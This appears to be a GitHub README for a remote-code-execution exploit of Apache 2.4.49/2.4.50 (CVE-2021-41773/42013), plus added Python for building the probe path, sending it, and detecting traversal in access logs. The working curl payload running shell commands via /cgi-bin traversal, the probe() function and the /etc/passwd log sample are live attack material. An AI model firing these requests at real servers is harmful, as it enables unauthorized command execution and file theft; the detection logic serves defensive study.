
Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50


mr-exo/CVE-2021-41773


RCE exploit for both Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013).

IMHO only "special" setups will be vulnerable to this RCE.
The same goes for the "arbitrary file read" exploits you have seen.

Both CVEs are essentially the same path-traversal vulnerability (the second exists because the fix for the first was incomplete).
The traversal only works from a mapped URI (e.g. one mapped with the "Alias" or "ScriptAlias" Apache directives); a path under DocumentRoot alone is not sufficient.

"/cgi-bin/" is mapped by default (via ScriptAlias), which is why it is used as the prefix in front of the path-traversal string.
In addition, ScriptAlias marks everything under the given directory as executable CGI (Apache treats it as Exec), regardless of file extension.

Requirements:

1/ mod_cgi enabled (not the default, but easy)
2/ the target binary must be executable (+x), which is the default for /bin/sh
3/ Apache must grant access to /bin or / (i.e. the default "Require all denied" on <Directory /> has been relaxed; not the default and difficult/unrealistic)

Check whether a server is vulnerable. The request uses the double-URL-encoded dot ".%%32%65" (the CVE-2021-42013 form, which also reaches 2.4.49, so one request covers both versions) rather than the single-encoded ".%2e" form of CVE-2021-41773. /bin/sh run as a CGI with no arguments reads its commands from stdin, i.e. from the POST body; the two leading echoes emit the CGI response header Apache expects:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Response from a vulnerable server:

uid=1(daemon) gid=1(daemon) groups=1(daemon)
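The following is an added Python example, not code from this repository. It builds the probe path used above for either encoding, shows by decoding why ".%%32%65" ends up as "..", and runs the same traversal logic over Apache access-log lines so the check can also be used to spot attempts after the fact. The "/cgi-bin" prefix is assumed to be the ScriptAlias-mapped one (as in the README), and the log lines are constructed for the example. probe() performs a real network request; run it only against systems you are authorized to test.

```python
"""Probe-path builder and access-log detection for the Apache 2.4.49/2.4.50
path-traversal RCE (CVE-2021-41773 / CVE-2021-42013).

Assumptions: /cgi-bin/ is the ScriptAlias-mapped prefix (as in the README);
SAMPLE_LOG below is constructed for this example and is not real traffic.
"""
import re
import urllib.parse
import urllib.request

# Encodings of "." whose normalization Apache got wrong.
DOT_ENCODINGS = {
    "single": ".%2e",      # CVE-2021-41773 payload (2.4.49)
    "double": ".%%32%65",  # CVE-2021-42013 payload (2.4.50; also reaches 2.4.49)
}

# Body the README posts: /bin/sh with no arguments reads commands from stdin,
# i.e. from the POST body. The echoes emit the CGI header Apache requires.
PROBE_BODY = b"echo Content-Type: text/plain; echo; id"


def build_probe_path(variant="double", depth=5, target="/bin/sh", prefix="/cgi-bin"):
    """Return the request path, e.g. /cgi-bin/.%%32%65/.../bin/sh."""
    dot = DOT_ENCODINGS[variant]
    return prefix + ("/" + dot) * depth + target


def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing (capped), mirroring what a
    server that decodes more than once ends up with. Returns (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = urllib.parse.unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def escapes_mapped_root(raw_path, prefixes=("/cgi-bin",)):
    """True if, after decoding, the path climbs above a mapped (Alias/ScriptAlias)
    prefix. Tracks depth per segment so 'tools/../status.cgi' is not flagged."""
    for prefix in prefixes:
        if raw_path.startswith(prefix + "/"):
            break
    else:
        return False
    decoded, _ = fully_decode(raw_path[len(prefix):])
    depth = 0
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


# Combined-log-format line: client, method, request path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def scan_access_log(lines, prefixes=("/cgi-bin",)):
    """Return (ip, method, path, status) for requests that traverse out of a mapped prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if escapes_mapped_root(path, prefixes):
            hits.append((m.group("ip"), m.group("method"), path, int(m.group("status"))))
    return hits


def probe(base_url, variant="double", timeout=5):
    """Send the README's check (POST to /bin/sh via the traversal) and return the
    response body. Network call: only use against systems you are authorized to test."""
    req = urllib.request.Request(base_url.rstrip("/") + build_probe_path(variant),
                                 data=PROBE_BODY, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Constructed sample: two traversal attempts (one per encoding) and two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2021:18:01:12 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 47 "-" "curl/7.79.1"',
    '203.0.113.7 - - [05/Oct/2021:18:01:15 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1234 "-" "curl/7.79.1"',
    '198.51.100.2 - - [05/Oct/2021:18:02:00 +0000] "GET /cgi-bin/status.cgi?verbose=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [05/Oct/2021:18:02:03 +0000] "GET /cgi-bin/tools/../status.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, method, path, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> {status}")
```

Two design points: the detector decodes until the string is stable instead of matching literal "%2e" or "%%32%65", so other encodings of the same dot segments are caught too, and it only flags paths that actually climb above the mapped prefix, so a legitimate "a/../b.cgi" under /cgi-bin/ does not produce a false positive. A 200 status on a flagged POST to .../bin/sh is the strongest signal that the server answered the RCE check.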
